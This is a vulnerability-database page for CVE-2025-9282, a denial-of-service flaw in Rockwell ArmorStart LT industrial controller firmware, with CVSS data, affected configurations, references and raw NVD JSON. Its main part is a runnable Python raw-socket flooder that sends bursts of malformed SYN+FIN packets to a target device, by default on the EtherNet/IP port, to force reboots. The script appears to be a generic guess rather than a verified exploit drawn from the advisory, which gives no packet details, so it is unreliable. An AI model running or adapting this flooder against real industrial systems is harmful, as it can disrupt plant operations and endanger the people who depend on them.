CVE-2025-9282

Description

A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles Comprehensive limited storm tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:rockwellautomation:armorstart_lt_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:rockwellautomation:armorstart_lt:-:*:*:*:*:*:*:* - NOT VULNERABLE

ArmorStart LT (all versions prior to vendor patch)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-9282 PoC - ArmorStart LT DoS
# Description: Send crafted network storm traffic to trigger device reboot
# Note: This PoC is for authorized security testing only

import socket
import struct
import time
import random

def create_storm_packet(dst_ip, dst_port):
    """Generate a packet simulating Achilles storm test traffic"""
    # Craft IP header
    ip_header = struct.pack('!BBHHHBBH4s4s',
        0x45,  # Version + IHL
        0x00,  # TOS
        0x0040,  # Total length
        random.randint(0, 65535),  # ID
        0x4000,  # Flags + Fragment
        64,  # TTL
        6,  # Protocol (TCP)
        0,  # Checksum (placeholder)
        socket.inet_aton('10.0.0.1'),  # Src IP
        socket.inet_aton(dst_ip)  # Dst IP
    )
    
    # Craft TCP header with malformed flags
    tcp_header = struct.pack('!HHLLBBHHH',
        random.randint(1024, 65535),  # Src port
        dst_port,  # Dst port
        0,  # Seq
        0,  # Ack
        0x50,  # Data offset
        0x03,  # Flags (SYN + FIN)
        8192,  # Window
        0,  # Checksum
        0  # Urgent
    )
    
    return ip_header + tcp_header

def send_storm_traffic(target_ip, port=44818, duration=30):
    """Send storm traffic to trigger DoS condition"""
    print(f"[*] Starting storm test against {target_ip}:{port}")
    print(f"[*] Test duration: {duration} seconds")
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    sock.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
    
    start_time = time.time()
    packet_count = 0
    
    try:
        while time.time() - start_time < duration:
            packet = create_storm_packet(target_ip, port)
            sock.sendto(packet, (target_ip, port))
            packet_count += 1
            
            # High frequency burst
            for _ in range(100):
                sock.sendto(packet, (target_ip, port))
                packet_count += 1
    except KeyboardInterrupt:
        print("\n[!] Test interrupted by user")
    finally:
        sock.close()
        print(f"[*] Sent {packet_count} packets in {time.time() - start_time:.2f} seconds")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port] [duration]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 44818
    duration = int(sys.argv[3]) if len(sys.argv) > 3 else 30
    
    send_storm_traffic(target, port, duration)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-9282
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-9282
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-9282/
[4] VulDB https://vuldb.com/cve/CVE-2025-9282
[5] https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-9282", "sourceIdentifier": "[email protected]", "published": "2026-01-20T14:16:12.593", "lastModified": "2026-02-02T18:08:54.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles Comprehensive limited storm tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds."}, {"lang": "es", "value": "Existe un problema de seguridad en ArmorStart® LT que puede resultar en una condición de denegación de servicio. Durante la ejecución de las pruebas de tormenta limitadas de Achilles Comprehensive, el dispositivo se reinicia inesperadamente, causando que el Monitor de Estado de Enlace se caiga por varios segundos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rockwellautomation:armorstart_lt_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.002", "matchCriteriaId": "564CE3DE-2D80-4511-B970-C644C7217F20"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rockwellautomation:armorstart_lt:-:*:*:*:*:*:*:*", "matchCriteriaId": "E8AB2017-CB37-4A93-90FD-7FE82640FB77"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}